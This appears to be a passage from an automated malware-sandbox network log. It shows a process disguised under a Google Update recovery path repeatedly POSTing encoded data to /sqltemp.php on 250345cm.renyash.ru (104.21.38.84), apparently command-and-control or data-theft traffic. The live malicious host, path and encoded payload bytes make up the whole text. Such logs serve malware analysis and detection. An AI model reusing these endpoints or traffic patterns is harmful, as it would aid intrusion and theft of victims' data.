                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Sd6QxCFuOWxURmHvPNQzo2F8jzK%2F5%2Fbi%2BvypDtgNJ7jhw5QbpjzNOQC67znjE2UBUjVVvjJeAYqTY40lxa7UBWuCMa5xzXyKdaeAEURa2G%2FSZp3NxtDWy4UY4csCZfvhckRD13G"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36547cc038ca2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3289&min_rtt=2006&rtt_var=3319&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=118940&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                  93    192.168.2.6    62732    104.21.38.84    80    7048    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Jan 1, 2025 16:03:21.909168959 CET    302    OUT    POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:22.266801119 CET    1124    OUT    Data Raw: 56 55 5f 54 51 5d 54 53 58 56 52 59 56 5c 59 51 5b 5a 54 5c 55 59 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_TQ]TSXVRYV\YQ[ZT\UYP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$9Y /$= /:=R!=0<4=>#!4?!B&,+T:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:22.357624054 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:22.531091928 CET    803    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwwze13lOkYWuqyJkYD8PYzYxmqKGmgro9hD%2FElHpYz3cGl534Abb0vKnm%2B9lKaowAMy0VyVDZ0GYnwvwnXrm3sW6MVDl2FxomX3xGiDWv516lUWYcuJXQunAb1CxF0SAtltg42l"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3654c7f795e7a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2389&min_rtt=2229&rtt_var=1157&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=415362&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                  94    192.168.2.6    62733    104.21.38.84    80    7048    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Jan 1, 2025 16:03:22.660137892 CET    302    OUT    POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:23.017584085 CET    1124    OUT    Data Raw: 56 50 5f 52 54 59 51 57 58 56 52 59 56 5a 59 53 5b 5b 54 5a 55 5c 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VP_RTYQWXVRYVZYS[[TZU\PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^&?X"<!\3;,*9#(?*?R).?#"/Y+;5E1/R.&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:23.113488913 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:23.362490892 CET    810    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4sttTIhuq5ziWPpe6rL%2FZQmlCaTvB7JEk0dBhWiPvn%2BEunjSiyBk4gRzz3hbiyICXsk2%2BqzFGSs26Itdk5XTvEPfx%2FlzJ%2FDOvvXJ%2FOOMBttTtDuP5AARBpsvyJyjm60TzbTjTyp2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365512c4b7cf0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4874&min_rtt=1953&rtt_var=6575&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57652&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                  95    192.168.2.6    62734    104.21.38.84    80    7048    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Jan 1, 2025 16:03:23.488105059 CET    302    OUT    POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:23.844902992 CET    1124    OUT    Data Raw: 56 56 5f 53 54 58 51 57 58 56 52 59 56 5e 59 55 5b 52 54 5f 55 5a 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_STXQWXVRYV^YU[RT_UZPUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3>#/)%-489" .;?$=4 <(*&?7.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:23.931265116 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:24.194370985 CET    805    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3trBkbC55NggG6bN9L0jyuRE1wmPMehoI5xzGtdSHLBy%2FjgalWrQxLvbjqqsSRubHYI4HJEO70sFhRr6d9g6l%2F2uH5Pk6HJgjbiu7K72HZB7KdfZsFw8g893OujQ%2Bbh47Hmh39QY"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365564bca5e80-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2316&min_rtt=1641&rtt_var=1966&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=207239&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                  96    192.168.2.6    62735    104.21.38.84    80    7048    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Jan 1, 2025 16:03:24.420490980 CET    302    OUT    POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:24.766701937 CET    1124    OUT    Data Raw: 56 55 5f 53 51 5d 54 56 58 56 52 59 56 5c 59 50 5b 5b 54 51 55 5c 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_SQ]TVXVRYV\YP[[TQU\PTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0?["/1'@8.4=0+)U*>7+(;:&Y7-:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:24.859992027 CET    25    IN    HTTP/1.1 100 Continue


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                  97    192.168.2.6    62736    104.21.38.84    80    7048    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Jan 1, 2025 16:03:25.085496902 CET    302    OUT    POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:25.438642979 CET    1964    OUT    Data Raw: 53 55 5f 53 54 5c 51 50 58 56 52 59 56 5f 59 54 5b 59 54 5d 55 55 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_ST\QPXVRYV_YT[YT]UUPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y'=#,"$<.:7>3(>Y!17](;E1/R:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:25.548192978 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:25.801918983 CET    954    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2FluDovXkstYOxLhlQvjislLveS6acTSi6lOpO9YWneuYkRd0QrrmxhhZekb4NqvDX1N128rxtpLgOZ87WkytFKm8SoBJy9a9brqF%2BkD8mFLJaWscyd7oznyBDb2MIUCQcKGzE%2BE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365605a73c407-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3061&min_rtt=1472&rtt_var=3731&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=102903&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 09 29 3e 2d 0f 26 54 30 10 2b 13 20 0b 26 2d 31 02 29 3b 31 00 26 3d 27 11 3e 5f 3c 02 35 2c 07 58 31 38 0d 00 37 5b 24 01 27 24 2b 59 05 1c 23 1c 22 59 28 58 3d 03 38 04 25 3f 0c 05 33 2e 0e 1b 2b 2b 30 1e 22 28 20 07 33 2d 3c 5d 29 03 37 0a 26 3c 01 5f 2e 01 25 1d 24 10 2c 54 00 11 26 55 25 31 16 5d 23 24 3b 02 35 21 29 5b 25 0a 04 53 25 02 3b 54 23 29 25 06 32 0b 23 58 23 20 21 07 25 2b 25 5b 34 3e 2f 1a 28 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&)>-&T0+ &-1);1&='>_<5,X187[$'$+Y#"Y(X=8%?3.++0"( 3-<])7&<_.%$,T&U%1]#$;5!)[%S%;T#)%2#X# !%+%[4>/(.%S -H?WS0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                  98    192.168.2.6    62737    104.21.38.84    80    7048    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Jan 1, 2025 16:03:25.203449011 CET    302    OUT    POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:25.548065901 CET    1124    OUT    Data Raw: 53 50 5f 51 51 58 51 57 58 56 52 59 56 5e 59 55 5b 58 54 58 55 58 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_QQXQWXVRYV^YU[XTXUXPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?:7?!_0-?E/7/(_?V)><X 2#Z+%<'-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:25.647399902 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:25.817183971 CET    802    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98EcbIoHvi6%2Bgh7dBzrLSiTKxCMv3DiHbg0cF6D3VHH8H09l19I0wmtVVOWuApOpDpxXqe3OwT2zcHBVB66GkBtKflGisQd4zfM4dw%2FKN8qkCI5KOVy0MkpT0gSPhDnPGTAXvBso"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365610a4a0f80-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3862&min_rtt=1479&rtt_var=5321&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=71066&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  99 | 192.168.2.6 | 62738 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:25.940326929 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:26.297955990 CET | 1124 | OUT | Data Raw: 56 53 5a 57 54 51 54 57 58 56 52 59 56 5e 59 55 5b 52 54 50 55 58 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VSZWTQTWXVRYV^YU[RTPUXPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.$) !_3>;C.:W ><Z*)*=(]#?(!A1/#V-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:26.384270906 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:26.567681074 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMFkEiE31746LEZ%2F1JPPrj47SXDqyd0OMR60xbJ5AHM8WQ0O2ugPzQFbDJabxj6oFcQUvaXO%2BwAf0ndPgyA7cmG8ghdahrx%2BTjk%2F0ABwRR0JhbInG3r5S8jNHrbaiUsR6Vx8wCNL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3656598e94308-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2460&min_rtt=1777&rtt_var=2033&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=201490&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  100 | 192.168.2.6 | 62739 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:26.689188004 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:27.070770025 CET | 1124 | OUT | Data Raw: 53 57 5f 5c 54 50 54 50 58 56 52 59 56 51 59 52 5b 5e 54 5d 55 5a 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_\TPTPXVRYVQYR[^T]UZPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&/-X ,-^0.D/=W >$^?+R*X$X 17]*+"2Y<.:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:27.143794060 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:27.424130917 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PRm1K7v%2BJXz6eJyS1YTYGpAFVeDbE%2Fj%2F%2B6KFoAxC6IXAvTtOq6aZL3szgcTewKu9dLSdpq%2F63DoikXo5Mid5zsvX19a%2B4YvvTyrM2iHCaPBbHhDcsB8Om0xnVwIGs2I3147jpzvl"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3656a5e738c1e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4589&min_rtt=1983&rtt_var=5956&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=63942&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  101 | 192.168.2.6 | 62740 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:27.550111055 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:27.907294035 CET | 1124 | OUT | Data Raw: 56 53 5f 52 51 5d 54 50 58 56 52 59 56 51 59 5f 5b 59 54 5d 55 5f 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_RQ]TPXVRYVQY_[YT]U_P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3<94%_0.?D,9#-3?:;)'4",+]=A% -&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:28.022033930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:28.201001883 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QECwCsWnbW4QVAdZ7H%2BN0PzVRcABeyTsnQOf57988IlIenQYaxfbmbMRHLKfIifhTjK7QjEokqL%2BSWob6Ce%2FfzR7r7h%2FD%2Fo8mxTJccPZBnaIok9uDgNxYL%2BMY%2F26kn0kQkoCkAvM"}],"group":"cf-nel","max_age":604800}
